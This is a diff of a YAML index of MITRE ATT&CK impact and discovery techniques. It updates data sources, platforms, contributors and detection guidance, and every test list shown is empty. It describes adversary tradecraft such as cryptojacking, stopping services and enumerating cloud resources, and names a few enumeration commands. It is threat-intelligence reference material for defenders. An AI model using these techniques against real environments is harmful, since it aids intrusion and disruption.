x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - SaaS + - IaaS - Linux - macOS - - Windows - - AWS - - GCP - - Azure AD - - SaaS - - Azure - - Office 365 + - Google Workspace atomic_tests: [] T1561.001: technique: @@ -44086,9 +46686,11 @@ impact: - macOS - Windows x_mitre_data_sources: - - Kernel drivers - - Process monitoring - - Process command-line parameters + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Driver: Driver Load' + - 'Drive: Drive Access' + - 'Drive: Drive Modification' x_mitre_detection: 'Look for attempts to read/write to sensitive locations like the partition boot sector or BIOS parameter block/superblock. Monitor for direct access read/write attempts using the \\\\.\\ notation.(Citation: @@ -44180,9 +46782,11 @@ impact: read/write attempts using the \\\\.\\ notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.' x_mitre_data_sources: - - Kernel drivers - - Process monitoring - - Process command-line parameters + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Driver: Driver Load' + - 'Drive: Drive Access' + - 'Drive: Drive Modification' x_mitre_platforms: - Linux - macOS @@ -44232,9 +46836,11 @@ impact: using the \\\\.\\ notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.' x_mitre_data_sources: - - Kernel drivers - - Process monitoring - - Process command-line parameters + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Driver: Driver Load' + - 'Drive: Drive Access' + - 'Drive: Drive Modification' x_mitre_platforms: - Linux - macOS @@ -44307,8 +46913,14 @@ impact: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: impact - modified: '2020-09-16T15:56:03.459Z' + modified: '2021-04-14T12:05:31.985Z' created: '2019-04-18T11:00:55.862Z' + x_mitre_contributors: + - Alfredo Oliveira, Trend Micro + - David Fiser, @anu4is, Trend Micro + - Magno Logan, @magnologan, Trend Micro + - Vishwas Manral, McAfee + - Yossi Weizman, Azure Defender Research Team x_mitre_is_subtechnique: false x_mitre_detection: |- Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts. @@ -44317,26 +46929,23 @@ impact: Externally monitor the availability of services that may be targeted by an Endpoint DoS. x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - SaaS + - IaaS - Linux - macOS - - Windows - - AWS - - GCP - - Azure - - Office 365 - - Azure AD - - SaaS + - Google Workspace + - Containers x_mitre_impact_type: - Availability - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_data_sources: - - SSL/TLS inspection - - Web logs - - Web application firewall logs - - Network intrusion detection system - - Network protocol analysis - - Network device logs - - Netflow/Enclave netflow + - 'Sensor Health: Host Status' + - 'Application Log: Application Log Content' + - 'Network Traffic: Network Traffic Content' + - 'Network Traffic: Network Traffic Flow' atomic_tests: [] T1491.002: technique: @@ -44381,9 +46990,9 @@ impact: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: impact - modified: '2020-04-22T15:19:31.380Z' + modified: '2021-03-08T10:33:01.745Z' created: '2020-02-20T14:34:08.496Z' - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_impact_type: - Integrity @@ -44393,16 +47002,15 @@ impact: of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation. x_mitre_data_sources: - - Web logs - - Web application firewall logs - - Packet capture + - 'File: File Modification' + - 'File: File Creation' + - 'Application Log: Application Log Content' + - 'Network Traffic: Network Traffic Content' x_mitre_platforms: + - Windows + - IaaS - Linux - macOS - - Windows - - AWS - - GCP - - Azure atomic_tests: [] T1495: technique: @@ -44450,8 +47058,7 @@ impact: MITRE Trustworthy Firmware Measurement) Log attempts to read/write to BIOS and compare against known patching behavior.' x_mitre_data_sources: - - BIOS - - Component firmware + - 'Firmware: Firmware Modification' atomic_tests: [] T1490: technique: @@ -44499,11 +47106,11 @@ impact: - User x_mitre_version: '1.0' x_mitre_data_sources: - - Windows Registry - - Services - - Windows event logs - - Process command-line parameters - - Process monitoring + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Service: Service Metadata' + - 'Windows Registry: Windows Registry Key Modification' + - 'File: File Deletion' x_mitre_detection: |- Use process monitoring to monitor the execution and command line parameters of binaries involved in inhibiting system recovery, such as vssadmin, wbadmin, and bcdedit. The Windows event logs, ex. Event ID 524 indicating a system catalog was deleted, may contain entries associated with suspicious activity. @@ -44675,9 +47282,10 @@ impact: of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation. x_mitre_data_sources: - - Web logs - - Web application firewall logs - - Packet capture + - 'File: File Modification' + - 'File: File Creation' + - 'Application Log: Application Log Content' + - 'Network Traffic: Network Traffic Content' x_mitre_platforms: - Linux - macOS @@ -44774,8 +47382,11 @@ impact: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: impact - modified: '2020-09-16T15:58:18.788Z' + modified: '2021-04-12T18:34:06.995Z' created: '2019-04-17T20:23:15.105Z' + x_mitre_contributors: + - Yossi Weizman, Azure Defender Research Team + - Vishwas Manral, McAfee x_mitre_is_subtechnique: false x_mitre_detection: 'Detection of Network DoS can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the @@ -44790,24 +47401,21 @@ impact: service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.' x_mitre_data_sources: - - Sensor health and status - - Network protocol analysis - - Netflow/Enclave netflow - - Network intrusion detection system - - Network device logs - x_mitre_version: '1.0' + - 'Sensor Health: Host Status' + - 'Network Traffic: Network Traffic Flow' + x_mitre_version: '1.1' x_mitre_impact_type: - Availability x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - SaaS + - IaaS - Linux - macOS - - Windows - - AWS - - GCP - - Azure AD - - SaaS - - Azure - - Office 365 + - Google Workspace + - Containers atomic_tests: [] T1499.001: technique: @@ -44869,10 +47477,9 @@ impact: study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.' x_mitre_data_sources: - - Network device logs - - Netflow/Enclave netflow - - Network intrusion detection system - - SSL/TLS inspection + - 'Sensor Health: Host Status' + - 'Network Traffic: Network Traffic Content' + - 'Network Traffic: Network Traffic Flow' x_mitre_platforms: - Linux - macOS @@ -44926,14 +47533,11 @@ impact: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: impact - modified: '2020-09-16T15:58:18.490Z' + modified: '2021-03-29T16:13:53.747Z' created: '2020-03-02T20:08:03.691Z' x_mitre_data_sources: - - Sensor health and status - - Network protocol analysis - - Netflow/Enclave netflow - - Network intrusion detection system - - Network device logs + - 'Sensor Health: Host Status' + - 'Network Traffic: Network Traffic Flow' x_mitre_detection: 'Detection of reflection amplification can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive @@ -44946,20 +47550,19 @@ impact: the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.' - x_mitre_version: '1.1' + x_mitre_version: '1.2' x_mitre_is_subtechnique: true x_mitre_impact_type: - Availability x_mitre_platforms: - - macOS - Windows - - Linux - - AWS - - Office 365 - Azure AD - - GCP - - Azure + - Office 365 - SaaS + - IaaS + - Linux + - macOS + - Google Workspace atomic_tests: [] T1496: technique: @@ -44973,15 +47576,21 @@ impact: Under The Hood Blog 2017) Servers and cloud-based(Citation: CloudSploit - Unused AWS Regions) systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised - and used for Resource Hijacking and cryptocurrency mining." + and used for Resource Hijacking and cryptocurrency mining. Containerized environments + may also be targeted due to the ease of deployment via exposed APIs and the + potential for scaling mining activities by deploying or compromising multiple + containers within an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation: + Trend Micro Exposed Docker APIs)\n\nAdditionally, some cryptocurrency mining + malware kills off processes for competing malware to ensure it’s not competing + for resources.(Citation: Trend Micro War of Crypto Miners)" name: Resource Hijacking created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - - url: https://attack.mitre.org/techniques/T1496 - source_name: mitre-attack + - source_name: mitre-attack external_id: T1496 + url: https://attack.mitre.org/techniques/T1496 - description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April 17, 2019. url: https://securelist.com/lazarus-under-the-hood/77908/ @@ -44990,34 +47599,51 @@ impact: Retrieved October 8, 2019. url: https://blog.cloudsploit.com/the-danger-of-unused-aws-regions-af0bf1b878fc source_name: CloudSploit - Unused AWS Regions + - source_name: Unit 42 Hildegard Malware + url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/ + description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking + Malware Targeting Kubernetes. Retrieved April 5, 2021.' + - source_name: Trend Micro Exposed Docker APIs + url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html + description: Oliveira, A. (2019, May 30). Infected Containers Target Docker + via Exposed APIs. Retrieved April 6, 2021. + - source_name: Trend Micro War of Crypto Miners + url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html + description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency + Miners: A Battle for Resources. Retrieved April 6, 2021.' type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: impact - modified: '2020-07-14T19:29:17.574Z' + modified: '2021-04-14T12:06:32.187Z' created: '2019-04-17T14:50:05.682Z' + x_mitre_contributors: + - David Fiser, @anu4is, Trend Micro + - Alfredo Oliveira, Trend Micro + - Jay Chen, Palo Alto Networks + - Magno Logan, @magnologan, Trend Micro + - Vishwas Manral, McAfee + - Yossi Weizman, Azure Defender Research Team x_mitre_is_subtechnique: false x_mitre_platforms: + - Windows + - IaaS - Linux - macOS - - Windows - - AWS - - GCP - - Azure + - Containers x_mitre_permissions_required: - User - Administrator x_mitre_impact_type: - Availability - x_mitre_version: '1.1' + x_mitre_version: '1.2' x_mitre_data_sources: - - Azure activity logs - - Stackdriver logs - - AWS CloudTrail logs - - Process use of network - - Process monitoring - - Network protocol analysis - - Network device logs + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'File: File Creation' + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Flow' + - 'Sensor Health: Host Status' x_mitre_detection: Consider monitoring process resource usage to determine anomalous activity associated with malicious hijacking of computer resources such as CPU, memory, and graphics processing resources. Monitor for suspicious use @@ -45073,8 +47699,11 @@ impact: - macOS - Windows x_mitre_data_sources: - - Process monitoring - - File monitoring + - 'Process: OS API Execution' + - 'File: File Creation' + - 'File: File Deletion' + - 'File: File Modification' + - 'File: File Metadata' x_mitre_detection: Inspect important application binary file hashes, locations, and modifications for suspicious/unexpected values. x_mitre_impact_type: @@ -45135,9 +47764,9 @@ impact: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: impact - modified: '2020-09-16T15:56:03.131Z' + modified: '2021-03-29T16:11:12.815Z' created: '2020-02-20T15:31:43.613Z' - x_mitre_version: '1.1' + x_mitre_version: '1.2' x_mitre_is_subtechnique: true x_mitre_impact_type: - Availability @@ -45148,40 +47777,43 @@ impact: Externally monitor the availability of services that may be targeted by an Endpoint DoS. x_mitre_data_sources: - - Netflow/Enclave netflow - - Network device logs - - Network intrusion detection system - - Web application firewall logs - - Web logs - - SSL/TLS inspection + - 'Sensor Health: Host Status' + - 'Application Log: Application Log Content' + - 'Network Traffic: Network Traffic Content' + - 'Network Traffic: Network Traffic Flow' x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - SaaS + - IaaS - Linux - macOS - - Windows - - AWS - - GCP - - Azure - - Office 365 - - Azure AD - - SaaS + - Google Workspace atomic_tests: [] T1489: technique: + created: '2019-03-29T19:00:55.901Z' + modified: '2021-03-02T22:11:32.017Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: impact + type: attack-pattern id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b description: "Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services - can inhibit or stop response to an incident or aid in the adversary's overall - objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer - 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish this by - disabling individual services of high importance to an organization, such - as MSExchangeIS, which will make Exchange content inaccessible + or processes can inhibit or stop response to an incident or aid in the adversary's + overall objectives to cause damage to the environment.(Citation: Talos Olympic + Destroyer 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish + this by disabling individual services of high importance to an organization, + such as MSExchangeIS, which will make Exchange content inaccessible (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer - 2018) Services may not allow for modification of their data stores while running. - Adversaries may stop services in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) - or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) - on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks - WannaCry Analysis)" + 2018) Services or processes may not allow for modification of their data stores + while running. Adversaries may stop services or processes in order to conduct + [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted + for Impact](https://attack.mitre.org/techniques/T1486) on the data stores + of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)" name: Service Stop created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 object_marking_refs: @@ -45203,12 +47835,6 @@ impact: url: https://www.secureworks.com/research/wcry-ransomware-analysis description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware Analysis. Retrieved March 26, 2019. - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: impact - modified: '2020-07-24T15:36:08.042Z' - created: '2019-03-29T19:00:55.901Z' x_mitre_is_subtechnique: false x_mitre_platforms: - Windows @@ -45218,7 +47844,7 @@ impact: - Administrator - SYSTEM - User - x_mitre_version: '1.1' + x_mitre_version: '1.2' x_mitre_detection: |- Monitor processes and command-line arguments to see if critical processes are terminated or stop running. @@ -45228,11 +47854,13 @@ impact: Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, ChangeServiceConfigW may be used by an adversary to prevent services from starting.(Citation: Talos Olympic Destroyer 2018) x_mitre_data_sources: - - File monitoring - - Process command-line parameters - - Process monitoring - - Windows Registry - - API monitoring + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Process: OS API Execution' + - 'Service: Service Metadata' + - 'Windows Registry: Windows Registry Key Modification' + - 'File: File Modification' + - 'Process: Process Termination' x_mitre_impact_type: - Availability identifier: T1489 @@ -45341,8 +47969,9 @@ impact: x_mitre_detection: Where applicable, inspect important file hashes, locations, and modifications for suspicious/unexpected values. x_mitre_data_sources: - - File monitoring - - Application logs + - 'File: File Creation' + - 'File: File Deletion' + - 'File: File Modification' x_mitre_platforms: - Linux - macOS @@ -45386,9 +48015,9 @@ impact: - macOS - Windows x_mitre_data_sources: - - Windows event logs - - Process command-line parameters - - Process monitoring + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Sensor Health: Host Status' x_mitre_permissions_required: - User - Administrator @@ -45589,8 +48218,9 @@ impact: or out-of-band integrity checking may be useful for identifying manipulated data. ' x_mitre_data_sources: - - Packet capture - - Network protocol analysis + - 'Process: OS API Execution' + - 'Network Traffic: Network Traffic Content' + - 'Network Traffic: Network Traffic Flow' x_mitre_platforms: - Linux - macOS @@ -45612,41 +48242,46 @@ discovery: - external_id: CAPEC-575 source_name: capec url: https://capec.mitre.org/data/definitions/575.html + - source_name: Elastic - Koadiac Detection with EQL + url: https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql + description: 'Stepanic, D.. (2020, January 13). Embracing offensive tooling: + Building detections against Koadic using EQL. Retrieved November 30, 2020.' object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: discovery - modified: '2020-09-16T15:10:18.260Z' + modified: '2021-04-14T12:26:11.595Z' created: '2017-05-31T21:31:06.988Z' x_mitre_is_subtechnique: false x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - SaaS + - IaaS - Linux - macOS - - Windows - - Office 365 - - Azure AD - - AWS - - GCP - - Azure - - SaaS + - Google Workspace x_mitre_permissions_required: - User x_mitre_detection: |- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). + + Monitor for processes that can be used to enumerate user accounts, such as net.exe and net1.exe, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL) x_mitre_data_sources: - - Azure activity logs - - Office 365 account logs - - API monitoring - - Process monitoring - - Process command-line parameters + - 'User Account: User Account Metadata' + - 'Command: Command Execution' + - 'Process: Process Creation' + - 'File: File Access' x_mitre_contributors: + - Daniel Stepanic, Elastic - Microsoft Threat Intelligence Center (MSTIC) - Travis Smith, Tripwire - x_mitre_version: '2.2' + x_mitre_version: '2.3' atomic_tests: [] T1010: technique: @@ -45675,9 +48310,9 @@ discovery: - macOS - Windows x_mitre_data_sources: - - API monitoring - - Process monitoring - - Process command-line parameters + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Process: OS API Execution' x_mitre_detection: |- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained. @@ -45756,10 +48391,9 @@ discovery: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained. x_mitre_data_sources: - - API monitoring - - File monitoring - - Process command-line parameters - - Process monitoring + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'File: File Access' x_mitre_contributors: - Mike Kemmerer x_mitre_version: '1.0' @@ -45932,32 +48566,27 @@ discovery: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: discovery - modified: '2020-08-13T16:53:55.390Z' + modified: '2021-03-16T12:54:41.133Z' created: '2020-02-21T21:08:36.570Z' x_mitre_contributors: - Praetorian x_mitre_data_sources: - - Stackdriver logs - - AWS CloudTrail logs - - Azure activity logs - - Office 365 account logs - - Process monitoring - - Process command-line parameters + - 'User Account: User Account Metadata' + - 'Command: Command Execution' x_mitre_permissions_required: - User x_mitre_detection: |- Monitor processes, command-line arguments, and logs for actions that could be taken to gather information about cloud accounts, including the use of calls to cloud APIs that perform account discovery. System and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. - x_mitre_version: '1.1' + x_mitre_version: '1.2' x_mitre_is_subtechnique: true x_mitre_platforms: - - AWS - - GCP - - Azure - - Office 365 - Azure AD + - Office 365 - SaaS + - IaaS + - Google Workspace atomic_tests: [] T1069.003: technique: @@ -45979,6 +48608,9 @@ discovery: Directory Leaks via Azure. Retrieved October 6, 2019. url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/ source_name: Black Hills Red Teaming MS AD Azure, 2018 + - source_name: Google Cloud Identity API Documentation + url: https://cloud.google.com/identity/docs/reference/rest + description: Google. (n.d.). Retrieved March 16, 2021. object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 @@ -45988,38 +48620,34 @@ discovery: With authenticated access there are several tools that can be used to find permissions groups. The Get-MsolRole PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts.(Citation: Microsoft Msolrole)(Citation: GitHub Raindance) - Azure CLI (AZ CLI) also provides an interface to obtain permissions groups with authenticated access to a domain. The command az ad user get-member-groups will list groups associated to a user account.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018) + Azure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command az ad user get-member-groups will list groups associated to a user account for Azure while the API endpoint GET https://cloudidentity.googleapis.com/v1/groups lists group resources available to a user for Google.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation) id: attack-pattern--16e94db9-b5b1-4cd0-b851-f38fbd0a70f2 type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: discovery - modified: '2020-10-08T17:34:39.077Z' + modified: '2021-03-30T12:42:46.315Z' created: '2020-02-21T21:15:33.222Z' x_mitre_data_sources: - - GCP audit logs - - Stackdriver logs - - AWS CloudTrail logs - - Azure activity logs - - Office 365 account logs - - API monitoring - - Process monitoring - - Process command-line parameters + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Group: Group Enumeration' + - 'Group: Group Metadata' + - 'Application Log: Application Log Content' x_mitre_permissions_required: - User x_mitre_detection: |- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Activity and account logs for the cloud services can also be monitored for suspicious commands that are anomalous compared to a baseline of normal activity. - x_mitre_version: '1.1' + x_mitre_version: '1.2' x_mitre_is_subtechnique: true x_mitre_platforms: - - Office 365 - Azure AD - - GCP + - Office 365 - SaaS - - Azure - - AWS + - IaaS + - Google Workspace atomic_tests: [] T1580: technique: @@ -46064,11 +48692,11 @@ discovery: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: discovery - modified: '2020-09-17T16:41:23.267Z' + modified: '2021-03-08T10:33:02.163Z' created: '2020-08-20T17:51:25.671Z' x_mitre_contributors: - Praetorian - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: false x_mitre_permissions_required: - User @@ -46080,14 +48708,16 @@ discovery: or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones. x_mitre_data_sources: - - GCP audit logs - - Stackdriver logs - - AWS CloudTrail logs - - Azure activity logs + - 'Instance: Instance Metadata' + - 'Instance: Instance Enumeration' + - 'Snapshot: Snapshot Metadata' + - 'Snapshot: Snapshot Enumeration' + - 'Cloud Storage: Cloud Storage Metadata' + - 'Cloud Storage: Cloud Storage Enumeration' + - 'Volume: Volume Metadata' + - 'Volume: Volume Enumeration' x_mitre_platforms: - - AWS - - Azure - - GCP + - IaaS atomic_tests: [] T1538: technique: @@ -46116,7 +48746,7 @@ discovery: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: discovery - modified: '2020-07-14T19:19:00.966Z' + modified: '2021-03-16T12:56:36.098Z' created: '2019-08-30T18:11:24.582Z' x_mitre_is_subtechnique: false x_mitre_detection: 'Monitor account activity logs to see actions performed and @@ -46124,50 +48754,21 @@ discovery: providers, such as AWS, provide distinct log events for login attempts to the management console.(Citation: AWS Console Sign-in Events)' x_mitre_data_sources: - - Office 365 audit logs - - Azure activity logs - - Stackdriver logs - - AWS CloudTrail logs + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' x_mitre_permissions_required: - User - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_contributors: - Praetorian x_mitre_platforms: - - AWS - - GCP - - Azure - Azure AD - Office 365 + - IaaS + - Google Workspace atomic_tests: [] T1526: technique: - created: '2019-08-30T13:01:10.120Z' - modified: '2020-06-23T14:31:41.758Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: discovery - type: attack-pattern - id: attack-pattern--e24fcba8-2557-4442-a139-1ee2f2e784db - description: "An adversary may attempt to enumerate the cloud services running - on a system after gaining access. These methods can differ from platform-as-a-service - (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). - Many services exist throughout the various cloud providers and can include - Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, - Azure AD, etc. \n\nAdversaries may attempt to discover information about the - services enabled throughout the environment. Azure tools and APIs, such as - the Azure AD Graph API and Azure Resource Manager API, can enumerate resources - and services, including applications, management groups, resources and policy - definitions, and their relationships that are accessible by an identity.(Citation: - Azure - Resource Manager API)(Citation: Azure AD Graph API)\n\nStormspotter - is an open source tool for enumerating and constructing a graph for Azure - resources and services, and Pacu is an open source AWS exploitation framework - that supports several methods for discovering cloud services.(Citation: Azure - - Stormspotter)(Citation: GitHub Pacu)" - name: Cloud Service Discovery - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1526 @@ -46188,28 +48789,114 @@ discovery: url: https://github.com/RhinoSecurityLabs/pacu description: Rhino Security Labs. (2019, August 22). Pacu. Retrieved October 17, 2019. - x_mitre_platforms: - - AWS - - GCP - - Azure - - Azure AD - - Office 365 - - SaaS - x_mitre_contributors: - - Suzy Schapperle - Microsoft Azure Red Team - - Praetorian - x_mitre_permissions_required: - - User - x_mitre_version: '1.1' - x_mitre_data_sources: - - Azure activity logs - - Stackdriver logs - - AWS CloudTrail logs + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Cloud Service Discovery + description: "An adversary may attempt to enumerate the cloud services running + on a system after gaining access. These methods can differ from platform-as-a-service + (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). + Many services exist throughout the various cloud providers and can include + Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, + Azure AD, etc. \n\nAdversaries may attempt to discover information about the + services enabled throughout the environment. Azure tools and APIs, such as + the Azure AD Graph API and Azure Resource Manager API, can enumerate resources + and services, including applications, management groups, resources and policy + definitions, and their relationships that are accessible by an identity.(Citation: + Azure - Resource Manager API)(Citation: Azure AD Graph API)\n\nStormspotter + is an open source tool for enumerating and constructing a graph for Azure + resources and services, and Pacu is an open source AWS exploitation framework + that supports several methods for discovering cloud services.(Citation: Azure + - Stormspotter)(Citation: GitHub Pacu)" + id: attack-pattern--e24fcba8-2557-4442-a139-1ee2f2e784db + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: discovery + modified: '2021-03-16T12:57:03.837Z' + created: '2019-08-30T13:01:10.120Z' + x_mitre_is_subtechnique: false x_mitre_detection: |- Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained. Normal, benign system and network events that look like cloud service discovery may be uncommon, depending on the environment and how they are used. Monitor cloud service usage for anomalous behavior that may indicate adversarial presence within the environment. + x_mitre_data_sources: + - 'Cloud Service: Cloud Service Metadata' + - 'Cloud Service: Cloud Service Enumeration' + x_mitre_version: '1.2' + x_mitre_permissions_required: + - User + x_mitre_contributors: + - Suzy Schapperle - Microsoft Azure Red Team + - Praetorian + x_mitre_platforms: + - Azure AD + - Office 365 + - SaaS + - IaaS + - Google Workspace + atomic_tests: [] + T1613: + technique: + external_references: + - source_name: mitre-attack + external_id: T1613 + url: https://attack.mitre.org/techniques/T1613 + - source_name: Docker API + url: https://docs.docker.com/engine/api/v1.41/ + description: Docker. (n.d.). Docker Engine API v1.41 Reference. Retrieved + March 31, 2021. + - source_name: Kubernetes API + url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/ + description: The Kubernetes Authors. (n.d.). The Kubernetes API. Retrieved + March 29, 2021. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Container and Resource Discovery + description: "Adversaries may attempt to discover containers and other resources + that are available within a containers environment. Other resources may include + images, deployments, pods, nodes, and other information such as the status + of a cluster.\n\nThese resources can be viewed within web applications such + as the Kubernetes dashboard or can be queried via the Docker and Kubernetes + APIs.(Citation: Docker API)(Citation: Kubernetes API) In Docker, logs may + leak information about the environment, such as the environment’s configuration, + which services are available, and what cloud provider the victim may be utilizing. + The discovery of these resources may inform an adversary’s next steps in the + environment, such as how to perform lateral movement and which methods to + utilize for execution. " + id: attack-pattern--0470e792-32f8-46b0-a351-652bc35e9336 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: discovery + modified: '2021-04-12T18:22:05.737Z' + created: '2021-03-31T14:26:00.848Z' + x_mitre_contributors: + - Vishwas Manral, McAfee + - Center for Threat-Informed Defense (CTID) + - Yossi Weizman, Azure Defender Research Team + x_mitre_version: '1.0' x_mitre_is_subtechnique: false + x_mitre_permissions_required: + - User + x_mitre_detection: "Establish centralized logging for the activity of container + and Kubernetes cluster components. This can be done by deploying logging agents + on Kubernetes nodes and retrieving logs from sidecar proxies for application + pods to detect malicious activity at the cluster level.\n\nMonitor logs for + actions that could be taken to gather information about container infrastructure, + including the use of discovery API calls by new or unexpected users. Monitor + account activity logs to see actions performed and activity associated with + the Kubernetes dashboard and other web applications. " + x_mitre_platforms: + - Containers + x_mitre_data_sources: + - 